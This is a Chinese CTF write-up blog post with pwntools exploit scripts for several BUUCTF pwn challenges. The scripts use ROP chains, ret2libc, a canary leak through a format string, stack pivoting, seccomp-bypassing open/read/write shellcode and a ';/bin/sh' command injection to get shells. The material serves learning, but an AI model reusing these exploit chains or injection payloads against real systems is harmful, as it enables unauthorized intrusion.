BUU-pwn(五)

最新推荐文章于 2022-10-13 20:11:18 发布
最新推荐文章于 2022-10-13 20:11:18 发布
阅读量262 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/126696941
版权

picoctf_2018_rop chain

调试参数完事了

from pwn import *
from LibcSearcher import *

context(os='linux', arch='i386', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",25634)
#r = process('./ez_pz_hackover_2016')
#r = gdb.debug("./PicoCTF_2018_rop_chain","b * 0x0804873A")

elf = ELF("./PicoCTF_2018_rop_chain")

flag_addr = elf.symbols['flag']
win1_addr = elf.symbols['win_function1']
win2_addr = elf.symbols['win_function2']
win2_a = 0x0BAAAAAAD
flag_a = 0x0DEADBAAD

payload = b'M'*(0x18+4) + p32(win1_addr) + p32(win2_addr) + p32(flag_addr) + p32(win2_a) + p32(flag_a)
r.sendlineafter("input> ",payload)

r.interactive()

jarvisoj_level3_x64

开启NX,64位的ret2libc,借助 ROPgadget 修改 rdi rsi rdx 三个寄存器的值,泄露write地址,没找到rdx的值,不过不影响,因为rdx本来为 0x200

看一手反汇编


栈:


符合条件

from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",29522)
#r = gdb.debug("./level3_x64","b * 0x0400619")
elf = ELF("./level3_x64")

main_addr = 0x040061A
write_plt = elf.plt["write"]
write_got = elf.got["write"]

pop_rdi = 0x04006b3   # pop rdi ; ret
pop_rsi = 0x04006b1   # pop rsi ; pop r15 ; ret

# 泄露write地址 ret2libc  rdi rsi rdx
payload = b'a'*0x80 + b'b'*0x8 + p64(pop_rdi)+p64(1)
payload += p64(pop_rsi)+p64(write_got)+p64(0)
payload += p64(write_plt)
payload += p64(main_addr)
r.sendlineafter('Input:\n',payload)

write_addr = u64(r.recv(8))
log.success(str(hex(write_addr)))

lib = LibcSearcher('write',write_addr)
offset = write_addr - lib.dump('write')
sys_addr = lib.dump('system') + offset
binsh_addr = lib.dump('str_bin_sh') + offset

payload2 = b'a'*0x80 + b'b'*0x8 + p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
r.sendlineafter('Input:\n',payload2)

r.interactive()

[Black Watch 入群题]PWN

栈迁移,这个图相当清楚了:https://blog.csdn.net/mcmuyanga/article/details/109260008

利用 leave 与 ret 指令劫持ebp与eip到某个位置

写rop到bss段上的s的地址

from pwn import *
from LibcSearcher import *

context(os='linux', arch='i386', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",28246)
#r = process('./spwn')
#r = gdb.debug("./spwn","b *0x0804850E")
elf = ELF("./spwn")

write_plt=elf.plt['write']
write_got=elf.got['write']
main=0x8048513
s=0x0804A300
leave_ret=0x08048408

def Libc(func,func_addr):
    lib = LibcSearcher(func,func_addr)
    offset = func_addr - lib.dump(func)
    sys_addr = lib.dump('system') + offset
    binsh_addr = lib.dump('str_bin_sh') + offset
    payload = p32(sys_addr)+p32(0)+p32(binsh_addr)
    return payload

def attack(arg,payload):
    r.recvuntil(arg)
    r.send(payload)  

payload = p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
attack("name?",payload)  # bss 泄露 write

payload2 = b'a'*0x18 + p32(s-4) + p32(leave_ret)
attack("say?",payload2) # 溢出->迁移到bss

write_addr = u32(r.recv(4))
payload = Libc('write',write_addr)

attack("name?",payload)
attack("say?",payload2)

r.interactive()

jarvisoj_level4

ret2libc

from pwn import *
from LibcSearcher import *

context(os='linux', arch='i386', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",26466)
#r = process('./spwn')
#r = gdb.debug("./level4","b main")
elf = ELF("./level4")

write_plt=elf.plt['write']
write_got=elf.got['write']
main=0x08048470

def Libc(func,func_addr):
    lib = LibcSearcher(func,func_addr)
    offset = func_addr - lib.dump(func)
    sys_addr = lib.dump('system') + offset
    binsh_addr = lib.dump('str_bin_sh') + offset
    payload = p32(sys_addr)+p32(0)+p32(binsh_addr)
    return payload

def attack(arg,payload):
    r.recvuntil(arg)
    r.send(payload)  

payload = b'a'*0x88+b'b'*0x4+ p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
r.sendline(payload)
write_addr = u32(r.recv(4))
payload = b'a'*0x88+b'b'*0x4 + Libc('write',write_addr)
sleep(0.5)
r.sendline(payload)

r.interactive()

bjdctf_2020_babyrop2

64位 canary保护


偏移为7到canary,利用格式化字符串泄露canary

from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",26741)
#r = process('./pwn')
#r = gdb.debug("./pwn","b * 0x0400857")
elf = ELF("./pwn")

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi = 0x0400993
vuln=0x0400887

def Libc(func,func_addr):
    lib = LibcSearcher(func,func_addr)
    offset = func_addr - lib.dump(func)
    sys_addr = lib.dump('system') + offset
    binsh_addr = lib.dump('str_bin_sh') + offset
    payload = p64(binsh_addr) + p64(sys_addr) + p64(0)
    return payload

r.sendlineafter('u!\n','%7$p')
r.recvuntil("0x")
can_addr = int(r.recv(16), 16)
print(can_addr)

payload = b'a'*(0x20-0x8) + p64(can_addr) + b'b'*0x8
payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)
r.sendlineafter('story!\n',payload)

puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
log.success(str(hex(puts_addr)))

payload2 = b'a'*(0x20-0x8) + p64(can_addr) + b'b'*0x8
payload2 += p64(pop_rdi) + Libc('puts',puts_addr)

r.sendlineafter('story!\n',payload2)

r.interactive()

wustctf2020_getshell

栈溢出

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",25177)
#r = process('./heap')  # babyheap_0ctf_2017
#r = gdb.debug("./heap")

shell = 0x0804851B
payload = b'a'*0x18+b'b'*0x4+p32(shell)
r.sendline(payload)
r.interactive()

pwnable_orw

开启canary保护
很明显输入shellcode后,执行shellcode,但是开头有一个 seccomp ,相当于系统调用时的一个白名单

seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandboxing 机制。在 Linux 系统里,大量的系统调用(system call)直接暴露给用户态程序。但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。

此时可以利用open read write输出flag

x86-32的内核传参为eax为syscall_number,ebx,ecx,edx,esi,edp用于将6个参数传递给系统调用。返回值保留再eax中,所有其它寄存(包括EFLAGS)都保留再int 0x80中。

#sys_open(flag,0,0)
xor ecx,ecx;	#此时ecx为0x0
mov eax,0x5;	#设置syscall调用号为0x5(open)
push ecx;		#设置栈顶为\x00结束字符
push 0x67616c66;#设置栈顶为flag,小端序
mov ebx,esp;	#将栈顶数值赋值到ebx上
xor edx,edx;	#设置权限
int 0x80;       #sys_open(flag,0,0)#

#sys_read(3,flag,0x30)
mov eax,0x3;	#设置调用号
mov ecx,ebx;	#将ebx中的flag赋值到ecx中
mov ebx,eax;	#设置文件描述符
mov dl,0x30;	#设置输出字节,dl为数据寄存器
int 0x80;

#sys_write(1,flag,0x30)
mov eax,0x4; 	#设置调用号
mov bl,0x1;  	#设置基址寄存器为0x1
mov edx,0x30 	#设置edx为0x30
int 0x80;


此为pwntools内置模板
/* open(file='flag.txt', oflag=0, mode=0) */
        /* push b'flag.txt\x00' */
        push 1					#入栈0x1
        dec byte ptr [esp]		#将esp栈顶指针减1
        push 0x7478742e			#.txt
        push 0x67616c66			#flag
        mov ebx, esp			#将栈顶元素移入ebx中
        xor ecx, ecx			#将ecx置零
        xor edx, edx			#将edx置零
        /* call open() */
        push 5 /* 5 */			#入栈0x5
        pop eax					#将栈顶元素0x5移入eax中,eax为syscall_number
        int 0x80
        /* read(fd='eax', buf='esp', nbytes=0x64) */
        mov ebx, eax			#将返回值eax移入ebx中
        mov ecx, esp			#将栈顶元素移入ecx中
        push 0x64				#入栈0x64
        pop edx					#将栈顶元素0x64移入edx中
        /* call read() */
        push 3 /* 3 */			#入栈0x3
        pop eax					#将栈顶元素0x3移入eax中
        int 0x80
        /* write(fd=1, buf='esp', n=0x64) */
        push 1					#入栈0x1
        pop ebx					#将栈顶元素0x1移入ebx中
        mov ecx, esp			#将栈顶元素移入ecx中
        push 0x64				#入栈0x64
        pop edx					#将栈顶元素0x1移入edx中
        /* call write() */
        push 4 /* 4 */			#入栈0x4
        pop eax					#将栈顶元素0x4移入eax中
        int 0x80

shellocde : https://zhuanlan.zhihu.com/p/158489498

手撸shellcode

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",28577)
#r = process('./heap')  # babyheap_0ctf_2017
#r = gdb.debug("./heap")

shellcode = asm('push 0x0;push 0x67616c66;mov ebx,esp;xor ecx,ecx;xor edx,edx;mov eax,0x5;int 0x80')
shellcode+=asm('mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x100;int 0x80')
shellcode+=asm('mov eax,0x4;mov ebx,0x1;int 0x80')
r.sendlineafter('shellcode:', shellcode)

r.interactive()

或者利用 shellcraft

from pwn import *
context(os='linux', arch='i386', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",28577)
#r = process('./heap')  # babyheap_0ctf_2017
#r = gdb.debug("./heap")
elf = ELF('./orw')
shellcode = shellcraft.open("/flag")
shellcode += shellcraft.read('eax','esp',100)
shellcode += shellcraft.write(1,'esp',100)
shellcode = asm(shellcode)

r.sendlineafter('shellcode:', shellcode)
r.interactive()

bjdctf_2020_router

发现ping命令,可能存在命令注入

在这里插入图片描述
命令注入

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",29720)
#r = process('./heap')  # babyheap_0ctf_2017
#r = gdb.debug("./heap")
payload = ';/bin/sh'
r.sendline('1')
r.sendlineafter('Please input the ip address:',payload)
r.interactive()
Ff.cheng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU】[第空间2019 决赛]PWN5
bzduanlei的博客
07-31 406
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
buu [第空间2019 决赛]PWN5 wp
n1ptune__的博客
05-02 218
存在格式化字符串漏洞 经过尝试发现偏移为10 from pwn import * addr=0x804c044 p=remote("node3.buuoj.cn",29172) #%10$n的意思是向偏移为10处所指向的地址处写入已经写的字符数 #即 mov [%10$n] , 字符数 payload=p32(addr)+"%10$n" p.sendline(payload) #p32写入的字符数是4 p.sendline("4") p.interactive() ...
BUUCTF-pwn(5)
njh18790816639的博客
11-25 397
jarvisoj_level4 简单的ret2libc! from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='i386') r = remote('node4.buuoj.cn',25768) #r = process('./level4') elf = ELF('./level4') main = elf.symbols['main'] write_plt = elf.plt['
BUUCTF 第空间2019 pwn5
qq_36995313的博客
10-03 622
BUUCTF 第空间2019 pwn5 程序分析 国际惯例checksec一下 然后打开IDA分析,IDA加载完过后,直接按F5,出现的是这些代码而不是main函数的代码 可以看到,有一个叫__libc_start_main的函数,它的参数中包含main函。程序执行时,并不是最先执行的main函数,在这之前还执行了很多初始化的代码,然后再使用__libc_start_main这个函数把main函数作为参数启动。(main函数执行完后也还会有代码执行)。 然后双击进main函数查看c语言伪代码 ...
BUUCTF--第空间决赛pwn5
sandyyyz的博客
10-13 406
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
BUUCTF 第空间2019PWN5
Rt1Text的博客
04-23 2089
1.checksec+运行 32位/NX保护/canary保护 2.IDA进行中 1.main()函数 printf()函数 考虑格式化字符串漏洞 通过0x61616161可以确定参数在第10个位置上 if ( atoi(nptr) == dword_804C044 ) { puts("ok!!"); system("/bin/sh"); } 如何拿到binsh程序也给出了 直接利用格式化字符串改写unk_804C044之中的数据,然后输入数据对比得到.
BUUCTF|PWN-[第空间2019 决赛]PWN5-WP
l2645470582_的博客
01-10 943
1.检查保护机制 (1)开启了金丝雀和堆栈保护 (2)该文件是32位的文件 2.用32位的IDA打开该文件 (1)F12查看关键字符串 (2)我们进入反编译代码看看,看到nptr=unk_804C044才能获取权限 (3)unk_804C044有4个字节 (4)printf(&buf);存在格式化字符串漏洞 (5)kali运行该文件,用%p看出偏移量为10,利用%10$n定位到这个位置 payload构造 payload = p32(0x804C044...
Pwn_9 作业讲解
weixin_30415113的博客
03-07 314
pwn1针对Alarm clock进行处理修改程序的16进制数值 Hook函数 将alarm函数替换掉在linux下使用命令 sed -i s/alarm/isnan/g ./pwn1 检查保护机制checksec --file ./pwn1NX 数据保护权限 可写的不可执行查看编译file ./pwn1./pwn1: ELF 32-bit LSB executable, Intel 8038...
怎么调试内存溢出的c++代码_WEBPWN入门级调试讲解
weixin_39961522的博客
11-20 295
前言一的假期整好赶上De1CTF,结果就是又被大师傅们吊打了,遇见一道WEBPWN,WEBPWN类型的题,网上资料相对较少,而且调试过程也基本没有记录,借此机会又学习了一波,记录一下前置知识WEBPHP介绍WEBPWN类型的题目,目前大部分多为PHPPWN,其实就是PHP加载外部扩展,核心漏洞点在so扩展库中,由于是php加载扩展库来调用其内部函数,所以和常规PWN题最大的不同点,...
pwn(三)
小明的小书包Ya
10-04 2392
pwn(三) 简单的溢出利用方法 程序没有开启任何保护 方法一:寻找程序中system的函数,再布局栈空间,最后成功调用system('/bin/sh') 方法二:将我们的shellcode写入bss段,然后用elf.bss()来获取bss段地址,从而程序流向到我们的shellcode 这里不用具体程序分析了,把payload分别写上 方法一:payload = 'a' * offset...
1.pwn基础总结
admin的博客
10-03 1万+
Int_overflow # Int_overflow context(log_level='debug', os='Linux', arch='amd64') p = remote("pwn.blackbird.wang", 9501) payload = "2147483648" p.sendlineafter("Input an int ( <0 )\n", payload) p.interactive() ret2text from pwn import * conte.
pwntools各使用模块简介
weixin_34259232的博客
09-12 887
pwntools pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,并且里面包含多个模块,使利用变得简单。可以在github上直接搜索pwntools 进行安装。 基本模块 asm : 汇编与反汇编,支持x86/x64/arm/mips/powerpc等基本上所有的主流平台dynelf : 用于远程符号泄漏,需要提供leak方法el...
Pwn入门笔记(一)基础编程函数
qq_33590156的博客
11-23 1883
基础编程函数文件库和设置本地文件的调试和远程端口的连接发送和接收文件的加载类函数打/解包函数打包:解包shellcode 正式开始学习pwn了,第一次写pwn脚本,在开始之前需要了解一些基础知识。写pwn脚本我们用python在linux环境下运行。 文件库和设置 安装pwntools库后,开头加上 from pwn import * 这是导入pwntools库的所有函数,也是一个pwn脚本的起点。 context(os="liunx",arch="x86/amd64",log_level="debug"
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值